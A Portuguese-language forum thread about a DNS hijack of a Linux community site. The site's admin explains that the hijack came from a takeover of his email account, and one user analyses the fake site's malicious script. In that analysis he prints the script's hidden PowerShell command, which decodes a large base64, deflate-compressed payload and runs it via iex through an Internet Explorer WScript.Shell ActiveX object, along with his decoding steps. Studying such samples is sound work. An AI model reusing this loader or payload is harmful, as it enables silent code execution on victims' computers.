Denuncie   Favoritos   Indicar  

01 02 03 04 05 06 07 08 09

VOL sofreu sequestro de DNS e foi apontado para um site FAKE

61. Envio do codigo

Perfil removido
removido
(usa Nenhuma)

Enviado em 25/11/2016 - 08:51h

Gostei demais dessa ideia.
Se alguém puder me enviar o código fico feliz! Quero dar uma fuçada também!
Enzo Ferber


Passa um email que mando o link pelo dropbox ou google drive.
Está proibido colar um link aqui que leve ao download do código.

0 0
  • Quote

    •   


    62. Re: VOL sofreu sequestro de DNS e foi apontado para um site FAKE

    Enzo de Brito Ferber
    EnzoFerber
    (usa FreeBSD)

    Enviado em 25/11/2016 - 08:52h

    tony130666 escreveu:

    Gostei demais dessa ideia.
    Se alguém puder me enviar o código fico feliz! Quero dar uma fuçada também!
    Enzo Ferber


    Passa um email que mando o link pelo dropbox ou google drive.
    Está proibido colar um link aqui que leve ao download do código.


    enzoferber@gmail.com


    Enzo Ferber
    []'s


    
$ indent -kr -i8 src.c
    

    
"(...)all right-thinking people know that (a) K&R are _right_ and (b) K&R are right." 
    
        - linux/Documentation/CodingStyle - TORVALDS, Linus.


    0 0
  • Quote

    • 63. Re: VOL sofreu sequestro de DNS e foi apontado para um site FAKE

    Perfil removido
    removido
    (usa Nenhuma)

    Enviado em 25/11/2016 - 09:12h

    [quote]EnzoFerber escreveu:

    [quote]tony130666 escreveu:

    Gostei demais dessa ideia.
    Se alguém puder me enviar o código fico feliz! Quero dar uma fuçada também!
    Enzo Ferber

    Já enviei. Dando ou não certo, estou aqui para saber o que viu ou deixou de ver ou tentar enviar de novo o arquivo.

    0 0
  • Quote

    • 64. Re: VOL sofreu sequestro de DNS e foi apontado para um site FAKE

    Fábio Berbert de Paula
    fabio
    (usa Debian)

    Enviado em 25/11/2016 - 09:19h

    Fernando, você deu uma confundida nas coisas. O servidor do VOL não foi invadido, o código-fonte não foi comprometido e muito menos o banco de dados. Tudo está 100% íntegro.

    O ataque foi, digamos, banal. Ele usou meu endereço de e-mail pra redefinir a senha de minha conta no registro.br e mudou o endereço IP do VOL pra apontar para o site fake que ele criou. Isso sinceramente não envolveu nenhuma técnica sofisticada e muito menos falhas de segurança no site.

    O desleixo foi meu com relação a minha conta de e-mail particular, que não usava dupla autenticação. Não sei como ele obteve acesso à minha senha, mas foi isso. E digo mais, 95% dos comprometimentos de sistema se dá via adivinhação/obtenção de senha. E a galera cai no conto de fadas da mídia achando que tem um monte de Kevin Mitnick por aí.


    5 0
  • Quote

    • 65. Re: VOL sofreu sequestro de DNS e foi apontado para um site FAKE

    Enzo de Brito Ferber
    EnzoFerber
    (usa FreeBSD)

    Enviado em 25/11/2016 - 09:24h

    tony130666 escreveu:

    [quote]EnzoFerber escreveu:

    [quote]tony130666 escreveu:

    Gostei demais dessa ideia.
    Se alguém puder me enviar o código fico feliz! Quero dar uma fuçada também!
    Enzo Ferber

    Já enviei. Dando ou não certo, estou aqui para saber o que viu ou deixou de ver ou tentar enviar de novo o arquivo.


    Ok, já baixei aqui.
    Vou brincar com ele em uma VM aqui.

    Já ouviram aquele ditado: "A curiosidade engrandece o gato" ?

    Enzo Ferber
    []'s


    
$ indent -kr -i8 src.c
    

    
"(...)all right-thinking people know that (a) K&R are _right_ and (b) K&R are right." 
    
        - linux/Documentation/CodingStyle - TORVALDS, Linus.


    0 0
  • Quote

    • 66. Re: VOL sofreu sequestro de DNS e foi apontado para um site FAKE

    Perfil removido
    removido
    (usa Nenhuma)

    Enviado em 25/11/2016 - 09:27h

    EnzoFerber escreveu:

    [quote]tony130666 escreveu:

    [quote]EnzoFerber escreveu:

    [quote]tony130666 escreveu:

    Gostei demais dessa ideia.
    Se alguém puder me enviar o código fico feliz! Quero dar uma fuçada também!
    Enzo Ferber

    Já enviei. Dando ou não certo, estou aqui para saber o que viu ou deixou de ver ou tentar enviar de novo o arquivo.


    Ok, já baixei aqui.
    Vou brincar com ele em uma VM aqui.

    Já ouviram aquele ditado: "A curiosidade engrandece o gato" ?

    Enzo Ferber

    Divirta-se muito, descubra tudo e não nos esconda nada.
    Vou ficar de prontidão na espera de novidades.



    0 0
  • Quote

    • 67. Re: VOL sofreu sequestro de DNS e foi apontado para um site FAKE

    Josue de Jesus Santos
    JJSantos
    (usa Gentoo)

    Enviado em 25/11/2016 - 09:40h

    fabio escreveu:

    Fernando, você deu uma confundida nas coisas. O servidor do VOL não foi invadido, o código-fonte não foi comprometido e muito menos o banco de dados. Tudo está 100% íntegro.

    O ataque foi, digamos, banal. Ele usou meu endereço de e-mail pra redefinir a senha de minha conta no registro.br e mudou o endereço IP do VOL pra apontar para o site fake que ele criou. Isso sinceramente não envolveu nenhuma técnica sofisticada e muito menos falhas de segurança no site.

    O desleixo foi meu com relação a minha conta de e-mail particular, que não usava dupla autenticação. Não sei como ele obteve acesso à minha senha, mas foi isso. E digo mais, 95% dos comprometimentos de sistema se dá via adivinhação/obtenção de senha. E a galera cai no conto de fadas da mídia achando que tem um monte de Kevin Mitnick por aí.


    Tá aí um comentário, sensato!

    0 0
  • Quote

    • 68. Re: VOL sofreu sequestro de DNS e foi apontado para um site FAKE

    Enzo de Brito Ferber
    EnzoFerber
    (usa FreeBSD)

    Enviado em 25/11/2016 - 10:14h

    Parece direcionado apenas para Internet Explorer.

    A primeira função 'a' vai retornar false Firefox, Chrome, Safari, etc.
    E a variável DEGRADE é um ActiveXObject (só o IE que tem - http://stackoverflow.com/questions/7022568/activexobject-in-firefox-or-chrome-not-ie)

    Essa degrade é chamada com argumetno "Wscript.Shell".

    Aqui tem um exemplo de como ela pode ser usada: http://stackoverflow.com/a/15351708/1928852


    
function callShellApplication(){
    
  var objShell = new ActiveXObject("WScript.shell");
    
  objShell.run('c:\wkhtmltopdf.exe c:\PDFTestPage.html c:\TEST.pdf');
    
}


    E aí, quando ele chama DEGRADE.run(), o argumento (payload), é uma chamada ao powershell:



    
powershell.exe -NoP -NonI -W Hidden -C sal a New-Object;iex(a IO.StreamReader((a IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64String('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'),[IO.Compression.CompressionMode]::Decompress)),[Text.Encoding]::ASCII)).ReadToEnd()


    Me parece uma versão disso aqui: http://www.slideshare.net/HaydnJohnson/power-sploit-persistence-walkthrough

    Pra traduzir o payload usei a seguinte sequencia:

    1. Uma regex básica:


    
grep DEGRADE.run malware_vol.js | sed -e 's/[^0-9]/ /g > payload'


    2. Um programa em C para imprimir a string:


    
#include <stdio.h>
    
#include <ctype.h>
    

    
int main(void)
    
{
    
	FILE *fp = fopen("payload", "r");
    
	int c, number = 0;
    

    
	while((c = fgetc(fp))) {
    
		if(c == ' ') {
    
			if(number) {
    
				putchar(number);
    
				number = 0;
    
			}
    
		} else if(isdigit(c)){
    
			number *= 10;
    
			number += c - 48;
    
		}
    
		if(feof(fp)) break;
    
	}
    
	return 0;
    
}
    
 



    
gcc -o p p.c
    
./p > payload_decoded


    Se observarem, tem um payload em base64. Tentei extrair e decodificar, mas está em binário... Infelizmente não consigo ler binário desse jeito. Mas há 99,999% de chance de ser um .exe bonitão que vai fazer traquinagens mil!


    
1VzrchtHdv6trdp3QFgsm1yD0AyAuVnl3TRI8LIiKYHgxZTtpEBwDEEiAQgACV2iqrxDHic/8i55gbxCzunuc053D+h1baqSSpUtkpjp7nP9zqUb/V///h+b47L2Q+20XO28unlXDpe1neH0vjaeLMv5pFyWH2d303k5bwxms7vxcLAcTycvan/8A4xqPI4X45s7HL25nD+U9PFk8DgeDZbl1sbG9gv46H750V+g/2mxLO8b52/n5eB2PBk1Th5gna3NXwd3i7Je27hfLje2//iH8a+1LRzcuBqMl68m5VYSRdvbtS/4ZGtnMl3Wts7LxXLn9WD5traxWU4ev1evX++pc/Xz5tZPw7eD+U+//LKVZfU4SupFUY/jNvwfw/+J+Rk14WdaL5r13LwUxxH8jOxbhX4Tn8K4CN/HT2BMlNeLTA/VH5uX8FMza6veTs3TJk6Vbtd23k3Hk9q3325vbG8D+c+Eut9YuNW0v8aG8sh9tWUeR87jQhOFVOD/zbjebuuXcAy8778cm/HIQdtOa1YULhyya3/+8/8XAYN0wTq2tg7K5c7uw93yYV5uN04H92XjfHo8XZXzLXi7/FAT+vWKMFk7qac4bduZTgYZw3v2bPN2PAdr3tr8guJ4PZ+O5oP7/fFdudj6mKfbX+u16pOvtZ1JWducPNzdbf8U/fJCzzO60Xb7Q+2vsJaxYT23I9i4XuT1PLKcZ0aNRooOjWa6GUywgNn+8cuWM6FdZHQzLt8Oy18bt0ABvLQBWt948dSLi+Etv5gl8dMv8ltR9BtvPUzG/GKr7b+4tRnKaru28bOazTrzwe3Pp+Wy+3E2LxeLJGqUH8sNPQeYYLOV/c1pzucPgDLlXI/Rf6wZcvxqVx1bmzYrG4x7nNaOloOHn8fwz4A/82jQrHzVwv8VAHIwxDlRCwCdNaOOBhhhd/JwX84HyynaUO1LDYxTQGvTjND2uV3b/lLbvIxr3/3An18O7h7gwXe1jfrGV7PW5uAR1azt++p+TJCNMyxmg2HpGTa5Y8xu2NIepX01s1CQWFeK62lm/S1yfK9dT1xrq+30Lrpn184yMGda1LMU/4UZco06ac6o4no0LJKZ39DVDQplUT2Hf2GKTI9MHAKSep7aidqW5ER7BLGmsSQzDLk4sB0oZvAYa72A9FAL8FPLGT5u3I4Xs7vBJ5SglTQGsmcII/jazt34fVnb+NPgcfSnDY3ez571l4M5qHA+HYJt1nauxpPb6aq//ASx8HB8e1tOajNEjcXb8u4Ojaa2o+YjsIPJ8ni8WDqyA8zJDKoBU8C8/I0yyFr2s1xLJiMwtxhqVWVeAeHDL/CfFkWhoQygHaSZGajF31r4rzwBbeG/icHflnmS6zf1PPhLWs9jfAD0mbnMJEUWjohRf6khz8yaJLR8pJ8UkZ0radrV9RSwfKEfJPR3WtAQJMzQjlrG2aJgGWu5ep08cWYzEcIOaXnri2DMsvLATCWUZclTEmt5coHPDVN5zNKPSS5t/YuR5xp6HYU1m4HEcpkt89dpMmG0TF7YIR7FoMmAyTz4vKhqMqWprFri2AoS3e+3uG+zhAPmhRHLfZNVnNCjNpnek+oyb+S5fWB5LaxJVKSFPBbrFMzM58RiYtSbE695k6XC6kpSRyqptQWRluN3uZ3MrJ6RSp6WfEyKN3IsIjF7skhjP+J3OfkDUez4cErMWDMi08vaVmDWU5rWmgkfaH0NunYuekKqJ4/IUtKWv0aeeZ/nCRtR7g/IAr3HLif2SWGHWDKjWOgiWZqF8RG5lzhRyzNW0kvBwo0iWsnoKItokPOoAqMFwwPmn+aRoYLtv2DlRJlPXh64OEZks461jsjak+NLia/pLOUhjCTMj1VOYS3AuFIeMySyY5ihjLwW+Vg2Vp+J1YHrZNb1aQkbKHimmJDS+EteVD3JEaRhJCHDZNf3sDLNyPyKiGYz0OwYQCTeRNIP4Z0dsxKR2P05ItEyoZu1+EnTPrECSEKDYYgThSWh1foEZBQ6mZuEgiUBVc7SS1qkfIrhdmyz6TODxmd1RhHZ+iZFs3burV7kDDKEJNYmw9AahwbOfg4DLFpT0mFUK8DAGJORlzMsWuUblaMVZ76EGUiZXrsEx0IPSFiIBTsKO0STtOiLl+0rIqGJ0/n5jsQvS68Tvgs/VDTZiBLmPbWEhelD5kcEeZBQBOOAYNbIKEZnlDnZz0PTZrnnfry1BpQyzJB4JbIEVsoJgqEpzWkAh0IOOKEGU+Y79ZfICCOsxTl5Ji3u+KidLPeFyKwTdFl0blly2xIHjMYyy3kS+w9YJFnVfsi5Yt/mCnGRViB4Cd1BtC98YxSsdSCt8CSfMXLajLSQTMfTFTsPx+08QFQnqOYtT16OyZMjphX2mWTJgkKSGZ98EOS0nL2E1WJhkx4YMa1BTVuUSGRk+8p8cCzINJ0EkGyCcJaY58jo2UTuxhkrFVKwJDSG9ZTA0WaMhc+5h+UkLIIOa/Zcd8TV5QPjzildSB0sF/0KPiWRJxObmbFFkPtkuW/BnF5QTpyIn3B64VcwAv6cW1KqFMlkht4kGNESOKXl7aoM85wWWlVx3h/kKhlhY8oDgiTaek8uNuoCtmRDbA2ZH415hZwhk0XlFQNiDIQ19IDcQCJomxyH+JYslXLu1EuGEimdgqBgPYldWuDBpljibIJOvrAEmtuU8aU+OBLSFQwPnIZSDM3IoYl3Mnchy8IZadBCuTASJOjyJI69uSRBc2sX0hZR3Kw8IRETkznVgTZmBJ+nn